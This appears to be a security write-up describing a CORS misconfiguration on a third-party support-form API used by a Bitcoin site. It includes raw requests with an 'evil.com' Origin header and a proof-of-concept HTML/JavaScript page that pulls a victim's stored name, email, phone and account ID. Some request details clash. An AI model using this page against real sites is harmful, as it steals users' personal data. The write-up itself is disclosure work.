Exploiting Misconfigured CORS on popular BTC Site
Severity: Medium
Complexity : Easy
Weakness : Allowing ACAH
On one of the popular BTC site , I was facing some issue with account so i used the’r support form to inform them .
Thing’s i Provided By form :
- Email .
- Phone Number.
- Name.
- Message.
Clicked on Submit and Noticed that Form is being sent to third party site .
https://api.thirdparty.com/api/contact/widget/281d02/ in form of POST Data .
POST /api/contact/widget/281d02/ HTTP/1.1
Host: api.thirdparty.com
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.8
Cookie: REDACTED
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
{“firstName”:”adsgasgsag”,”lastName”:null,”company”:null,”email”:”asgasgasgn1241@gmail.com”,”phone”:”9876543210",”accountId”:”38517",”message”:”xxx”,”Tags”:[]}
- After Sending form i changed the request Method to GET ,
- Added Origin: evil.com in Request Header
GET /api/contact/widget/281d02/ HTTP/1.1
Origin: evil.com
- Response :
Access-Control-Allow-Origin: evil.com
Access-Control-Allow-Credentials: true
{"contactUid":"025381","firstName":"adsgasgsag","lastName":null,"company":null,"email":"asgasgasgn1241@gmail.com","phone":"9123091647","additionalDetails":{},"accountId":38517,”location”:null,”Tags”:[]}
- Surprised to see Access-Control-Allow-Credentials: true
<html>
<body onload=’load()’><p id=”demo”></p>Name: <h3 id=”name”></h3>
Email : <h3 id=”email”></h3>
Phone : <h3 id=”phone”></h3>
ACCID :<h3 id=”AccountID”></h3>
<h3 id=”que”></h3><script>
function load(){
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function(){
if(this.readyState == 4 && this.status == 200){
//document.getElementById(‘demo’).innerHTML = JSON.stringify(this.responseText);
parsed = JSON.parse(this.responseText);
var arr = [];
for(var x in parsed){
arr.push(parsed[x]);
}
console.log(arr)
document.getElementById(‘email’).innerHTML = arr[6];
document.getElementById(‘name’).innerHTML = arr[3];
document.getElementById(‘phone’).innerHTML = arr[7];
document.getElementById(‘AccountID’).innerHTML = arr[9];}
};
xhr.open(“GET”,”https://api.thirdparty.com/api/contact/widget/281d02",true);
xhr.send();
}</script></body>
</html>
- As Soon as victim(user who used the’r support form at anytime or any previous date) visit’s malicious page . His previous form data get’s extracted .